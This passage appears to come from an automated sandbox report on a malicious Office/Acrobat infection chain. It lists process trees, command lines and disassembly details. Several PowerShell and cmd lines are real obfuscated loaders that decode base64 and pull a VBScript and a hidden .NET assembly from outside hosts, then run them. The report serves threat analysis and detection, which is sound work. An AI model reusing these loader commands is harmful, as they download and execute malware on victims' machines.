QVRBXGtpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlcy52YlMi'+[CHaR]0X22+'))')))"
                                                                                            Imagebase:0x13f4b0000
                                                                                            File size:443'392 bytes
                                                                                            MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:moderate
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:8
                                                                                            Start time:00:57:50
                                                                                            Start date:10/12/2024
                                                                                            Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -Embedding
                                                                                            Imagebase:0xaa0000
                                                                                            File size:2'525'680 bytes
                                                                                            MD5 hash:2F8D93826B8CBF9290BC57535C7A6817
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:9
                                                                                            Start time:00:57:53
                                                                                            Start date:10/12/2024
                                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\izhw321o\izhw321o.cmdline"
                                                                                            Imagebase:0x13fa00000
                                                                                            File size:2'758'280 bytes
                                                                                            MD5 hash:23EE3D381CFE3B9F6229483E2CE2F9E1
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:moderate
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:10
                                                                                            Start time:00:57:54
                                                                                            Start date:10/12/2024
                                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES476D.tmp" "c:\Users\user\AppData\Local\Temp\izhw321o\CSCDC8260CFBF8C4877B302B76AFCC254F.TMP"
                                                                                            Imagebase:0x13ff00000
                                                                                            File size:52'744 bytes
                                                                                            MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:12
                                                                                            Start time:00:58:00
                                                                                            Start date:10/12/2024
                                                                                            Path:C:\Windows\System32\wscript.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\kidsniceformetogetbackgreatthingswithnetiertimegivenmebes.vbS"
                                                                                            Imagebase:0xff5c0000
                                                                                            File size:168'960 bytes
                                                                                            MD5 hash:045451FA238A75305CC26AC982472367
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:13
                                                                                            Start time:00:58:01
                                                                                            Start date:10/12/2024
                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $portioned = 'JHByZW9idGFpbnMgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskbGFsbHlnYWdnaW5nID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskdGF1bnRpbmdseSA9ICRsYWxseWdhZ2dpbmcuRG93bmxvYWREYXRhKCRwcmVvYnRhaW5zKTskbm9udmlyZ2lucyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCR0YXVudGluZ2x5KTskbmV3c21lbiA9ICc8PEJBU0U2NF9TVEFSVD4+Jzskc3Bpcml0dWFsaXN0aWMgPSAnPDxCQVNFNjRfRU5EPj4nOyRhc2Fmb2V0aWRhcyA9ICRub252aXJnaW5zLkluZGV4T2YoJG5ld3NtZW4pOyRzbm9vemUgPSAkbm9udmlyZ2lucy5JbmRleE9mKCRzcGlyaXR1YWxpc3RpYyk7JGFzYWZvZXRpZGFzIC1nZSAwIC1hbmQgJHNub296ZSAtZ3QgJGFzYWZvZXRpZGFzOyRhc2Fmb2V0aWRhcyArPSAkbmV3c21lbi5MZW5ndGg7JG95ZXMgPSAkc25vb3plIC0gJGFzYWZvZXRpZGFzOyRzdGlsbGluZyA9ICRub252aXJnaW5zLlN1YnN0cmluZygkYXNhZm9ldGlkYXMsICRveWVzKTskaG9sbG93bmVzc2VzID0gLWpvaW4gKCRzdGlsbGluZy5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkc3RpbGxpbmcuTGVuZ3RoKV07JGNvbGVzbGF3cyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhvbGxvd25lc3Nlcyk7JG1hbmFnZW1lbnRzID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkY29sZXNsYXdzKTskamV3ZmlzaCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRqZXdmaXNoLkludm9rZSgkbnVsbCwgQCgnMC9uQ3gzMC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGZvcmViZWFyJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCAnQ2FzUG9sJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCcxJywnJGZvcmViZWFyJykpOw==';$reprovals = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($portioned));Invoke-Expression $reprovals
                                                                                            Imagebase:0x13f4b0000
                                                                                            File size:443'392 bytes
                                                                                            MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:moderate
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:15
                                                                                            Start time:00:58:06
                                                                                            Start date:10/12/2024
                                                                                            Path:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
                                                                                            Imagebase:0xf10000
                                                                                            File size:9'805'808 bytes
                                                                                            MD5 hash:326A645391A97C760B60C558A35BB068
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:16
                                                                                            Start time:00:58:06
                                                                                            Start date:10/12/2024
                                                                                            Path:C:\Windows\System32\mshta.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\System32\mshta.exe -Embedding
                                                                                            Imagebase:0x13fcd0000
                                                                                            File size:13'824 bytes
                                                                                            MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:18
                                                                                            Start time:00:58:13
                                                                                            Start date:10/12/2024
                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Windows\system32\cmd.exe" "/c poWerSHell.eXE -Ex bypasS -NOP -w 1 -c DevIcECreDenTiALDepLOyment ; inVoKE-eXPRESsion($(INvOkE-expReSSIOn('[SYsTEM.TeXt.EncoDINg]'+[CHaR]0x3a+[cHar]58+'utf8.geTStRINg([SYsTEm.CONverT]'+[chAr]58+[cHaR]58+'FRoMBASE64strinG('+[char]0X22+'JGNGT0hOanFQbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1CZVJkZUZJTmlUaU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZWFGUUh5ZyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVHh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsTU0sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTW52bEhRb3AsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtmYmV1bVIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImdOdyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMVXRKQlYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkY0ZPSE5qcVBsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xNDIuNjAvNDY2L2tpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlc3Rmb3JtZS50SUYiLCIkRU52OkFQUERBVEFca2lkc25pY2Vmb3JtZXRvZ2V0YmFja2dyZWF0dGhpbmdzd2l0aG5ldGllcnRpbWVnaXZlbm1lYmVzLnZiUyIsMCwwKTtTdEFSdC1zTGVFcCgzKTtJblZvS0UtRXhQUkVTc2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXGtpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlcy52YlMi'+[CHaR]0X22+'))')))"
                                                                                            Imagebase:0x4a810000
                                                                                            File size:345'088 bytes
                                                                                            MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:20
                                                                                            Start time:00:58:13
                                                                                            Start date:10/12/2024
                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:poWerSHell.eXE -Ex bypasS -NOP -w 1 -c DevIcECreDenTiALDepLOyment ; inVoKE-eXPRESsion($(INvOkE-expReSSIOn('[SYsTEM.TeXt.EncoDINg]'+[CHaR]0x3a+[cHar]58+'utf8.geTStRINg([SYsTEm.CONverT]'+[chAr]58+[cHaR]58+'FRoMBASE64strinG('+[char]0X22+'JGNGT0hOanFQbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1CZVJkZUZJTmlUaU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZWFGUUh5ZyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVHh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsTU0sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTW52bEhRb3AsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtmYmV1bVIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImdOdyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMVXRKQlYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkY0ZPSE5qcVBsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xNDIuNjAvNDY2L2tpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlc3Rmb3JtZS50SUYiLCIkRU52OkFQUERBVEFca2lkc25pY2Vmb3JtZXRvZ2V0YmFja2dyZWF0dGhpbmdzd2l0aG5ldGllcnRpbWVnaXZlbm1lYmVzLnZiUyIsMCwwKTtTdEFSdC1zTGVFcCgzKTtJblZvS0UtRXhQUkVTc2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXGtpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlcy52YlMi'+[CHaR]0X22+'))')))"
                                                                                            Imagebase:0x13f4b0000
                                                                                            File size:443'392 bytes
                                                                                            MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:21
                                                                                            Start time:00:58:18
                                                                                            Start date:10/12/2024
                                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\24vqjdjh\24vqjdjh.cmdline"
                                                                                            Imagebase:0x13fb30000
                                                                                            File size:2'758'280 bytes
                                                                                            MD5 hash:23EE3D381CFE3B9F6229483E2CE2F9E1
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:22
                                                                                            Start time:00:58:18
                                                                                            Start date:10/12/2024
                                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA5F0.tmp" "c:\Users\user\AppData\Local\Temp\24vqjdjh\CSCC170874EB5994B058785371DF20B8BA.TMP"
                                                                                            Imagebase:0x13f200000
                                                                                            File size:52'744 bytes
                                                                                            MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:25
                                                                                            Start time:00:58:24
                                                                                            Start date:10/12/2024
                                                                                            Path:C:\Windows\System32\wscript.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\kidsniceformetogetbackgreatthingswithnetiertimegivenmebes.vbS"
                                                                                            Imagebase:0xffc30000
                                                                                            File size:168'960 bytes
                                                                                            MD5 hash:045451FA238A75305CC26AC982472367
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:26
                                                                                            Start time:00:58:24
                                                                                            Start date:10/12/2024
                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $portioned = 'JHByZW9idGFpbnMgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskbGFsbHlnYWdnaW5nID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskdGF1bnRpbmdseSA9ICRsYWxseWdhZ2dpbmcuRG93bmxvYWREYXRhKCRwcmVvYnRhaW5zKTskbm9udmlyZ2lucyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCR0YXVudGluZ2x5KTskbmV3c21lbiA9ICc8PEJBU0U2NF9TVEFSVD4+Jzskc3Bpcml0dWFsaXN0aWMgPSAnPDxCQVNFNjRfRU5EPj4nOyRhc2Fmb2V0aWRhcyA9ICRub252aXJnaW5zLkluZGV4T2YoJG5ld3NtZW4pOyRzbm9vemUgPSAkbm9udmlyZ2lucy5JbmRleE9mKCRzcGlyaXR1YWxpc3RpYyk7JGFzYWZvZXRpZGFzIC1nZSAwIC1hbmQgJHNub296ZSAtZ3QgJGFzYWZvZXRpZGFzOyRhc2Fmb2V0aWRhcyArPSAkbmV3c21lbi5MZW5ndGg7JG95ZXMgPSAkc25vb3plIC0gJGFzYWZvZXRpZGFzOyRzdGlsbGluZyA9ICRub252aXJnaW5zLlN1YnN0cmluZygkYXNhZm9ldGlkYXMsICRveWVzKTskaG9sbG93bmVzc2VzID0gLWpvaW4gKCRzdGlsbGluZy5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkc3RpbGxpbmcuTGVuZ3RoKV07JGNvbGVzbGF3cyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhvbGxvd25lc3Nlcyk7JG1hbmFnZW1lbnRzID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkY29sZXNsYXdzKTskamV3ZmlzaCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRqZXdmaXNoLkludm9rZSgkbnVsbCwgQCgnMC9uQ3gzMC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGZvcmViZWFyJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCAnQ2FzUG9sJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCcxJywnJGZvcmViZWFyJykpOw==';$reprovals = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($portioned));Invoke-Expression $reprovals
                                                                                            Imagebase:0x13f4b0000
                                                                                            File size:443'392 bytes
                                                                                            MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Has exited:true

                                                                                            Disassembly

                                                                                            Code Analysis

                                                                                            Call Graph

                                                                                            • Entrypoint
                                                                                            • Decryption Function
                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            • Show Help
                                                                                            callgraph 1 Error: Graph is empty

                                                                                            Module: Sheet1

                                                                                            Declaration
                                                                                            LineContent
                                                                                            1

                                                                                            Attribute VB_Name = "Sheet1"

                                                                                            2

                                                                                            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                                            3

                                                                                            Attribute VB_GlobalNameSpace = False

                                                                                            4

                                                                                            Attribute VB_Creatable = False

                                                                                            5

                                                                                            Attribute VB_PredeclaredId = True

                                                                                            6

                                                                                            Attribute VB_Exposed = True

                                                                                            7

                                                                                            Attribute VB_TemplateDerived = False

                                                                                            8

                                                                                            Attribute VB_Customizable = True

                                                                                            9

                                                                                            Attribute VB_Name = "Sheet1"

                                                                                            10

                                                                                            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                                            11

                                                                                            Attribute VB_GlobalNameSpace = False

                                                                                            12

                                                                                            Attribute VB_Creatable = False

                                                                                            13

                                                                                            Attribute VB_PredeclaredId = True

                                                                                            14

                                                                                            Attribute VB_Exposed = True

                                                                                            15

                                                                                            Attribute VB_TemplateDerived = False

                                                                                            16

                                                                                            Attribute VB_Customizable = True

                                                                                            Module: Sheet2

                                                                                            Declaration
                                                                                            LineContent
                                                                                            1

                                                                                            Attribute VB_Name = "Sheet2"

                                                                                            2

                                                                                            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                                            3

                                                                                            Attribute VB_GlobalNameSpace = False

                                                                                            4

                                                                                            Attribute VB_Creatable = False

                                                                                            5

                                                                                            Attribute VB_PredeclaredId = True

                                                                                            6

                                                                                            Attribute VB_Exposed = True

                                                                                            7

                                                                                            Attribute VB_TemplateDerived = False

                                                                                            8

                                                                                            Attribute VB_Customizable = True

                                                                                            9

                                                                                            Attribute VB_Name = "Sheet2"

                                                                                            10

                                                                                            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                                                                            11

                                                                                            Attribute VB_GlobalNameSpace = False

                                                                                            12

                                                                                            Attribute VB_Creatable = False

                                                                                            13

                                                                                            Attribute VB_PredeclaredId = True

                                                                                            14

                                                                                            Attribute VB_Exposed = True

                                                                                            15

                                                                                            Attribute VB_TemplateDerived = False

                                                                                            16

                                                                                            Attribute VB_Customizable = True

                                                                                            Module: ThisWorkbook

                                                                                            Declaration
                                                                                            LineContent
                                                                                            1

                                                                                            Attribute VB_Name = "ThisWorkbook"

                                                                                            2

                                                                                            Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                                                                                            3

                                                                                            Attribute VB_GlobalNameSpace = False

                                                                                            4

                                                                                            Attribute VB_Creatable = False

                                                                                            5

                                                                                            Attribute VB_PredeclaredId = True

                                                                                            6

                                                                                            Attribute VB_Exposed = True

                                                                                            7

                                                                                            Attribute VB_TemplateDerived = False

                                                                                            8

                                                                                            Attribute VB_Customizable = True

                                                                                            9

                                                                                            Attribute VB_Name = "ThisWorkbook"

                                                                                            10

                                                                                            Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                                                                                            11

                                                                                            Attribute VB_GlobalNameSpace = False

                                                                                            12

                                                                                            Attribute VB_Creatable = False

                                                                                            13

                                                                                            Attribute VB_PredeclaredId = True

                                                                                            14

                                                                                            Attribute VB_Exposed = True

                                                                                            15

                                                                                            Attribute VB_TemplateDerived = False

                                                                                            16

                                                                                            Attribute VB_Customizable = True

                                                                                            Reset < >

                                                                                              Executed Functions

                                                                                              Function 02A80FB9 Relevance: .0, Instructions: 5COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000003.422499192.0000000002A80000.00000010.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_3_2a80000_mshta.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                              • Instruction ID: 02add810ccdb0647114194c8c4e24652f975610e5baaf30fe9777fd5a867665e
                                                                                              • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                              • Instruction Fuzzy Hash:
                                                                                              Function 02A80FB1 Relevance: .0, Instructions: 5COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000003.422499192.0000000002A80000.00000010.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_3_2a80000_mshta.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                              • Instruction ID: 02add810ccdb0647114194c8c4e24652f975610e5baaf30fe9777fd5a867665e
                                                                                              • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                              • Instruction Fuzzy Hash:
                                                                                              Function 02A80FC1 Relevance: .0, Instructions: 5COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000003.422499192.0000000002A80000.00000010.00000800.00020000.00000000.sdmp, Offset: 02A80000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_3_2a80000_mshta.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                              • Instruction ID: 02add810ccdb0647114194c8c4e24652f975610e5baaf30fe9777fd5a867665e
                                                                                              • Opcode Fuzzy Hash: a7746c4fcd792058dff34b208f858b26d0e20ac4c0d4ae1df23727354e10d21e
                                                                                              • Instruction Fuzzy Hash:

                                                                                              Execution Graph

                                                                                              Execution Coverage:5.1%
                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                              Signature Coverage:0%
                                                                                              Total number of Nodes:3
                                                                                              Total number of Limit Nodes:0
                                                                                              execution_graph 3797 7fe899a7ae1 3798 7fe899a7af1 URLDownloadToFileW 3797->3798 3800 7fe899a7c00 3798->3800

                                                                                              Executed Functions

                                                                                              Function 000007FE899A7018 Relevance: 1.6, APIs: 1, Instructions: 129filenetworkCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 97 7fe899a7018-7fe899a7ba1 101 7fe899a7bab-7fe899a7bb1 97->101 102 7fe899a7ba3-7fe899a7ba8 97->102 103 7fe899a7bbb-7fe899a7bfe URLDownloadToFileW 101->103 104 7fe899a7bb3-7fe899a7bb8 101->104 102->101 105 7fe899a7c06-7fe899a7c23 103->105 106 7fe899a7c00 103->106 104->103 106->105
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.451861026.000007FE899A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_7fe899a0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID: DownloadFile
                                                                                              • String ID:
                                                                                              • API String ID: 1407266417-0
                                                                                              • Opcode ID: e31f340fe9d15ba8a661b93e1673a535d6177e9401083e2848abd43506f0e4ea
                                                                                              • Instruction ID: a9146773a77b25eefd3a9b309086170ebea80d6183c814e77ed7d1106400197e
                                                                                              • Opcode Fuzzy Hash: e31f340fe9d15ba8a661b93e1673a535d6177e9401083e2848abd43506f0e4ea
                                                                                              • Instruction Fuzzy Hash: 1E31917191CA5C9FDB58EF5CD8857A9B7E1FB59311F00826ED04DD3661CB70B8068B81
                                                                                              Function 000007FE89A7380A Relevance: 2.8, Strings: 2, Instructions: 273COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000007.00000002.451920624.000007FE89A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A70000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_7_2_7fe89a70000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 88M$XhT
                                                                                              • API String ID: 0-50409379
                                                                                              • Opcode ID: fefb3978c1796a7e074846658e26f17aa5d99cafd11b13a388bc4a09a42954d4
                                                                                              • Instruction ID: 8d98bb7f5c5142bd370df2cbddd9ecbe653b82d6879ac57064738ea85403c65d
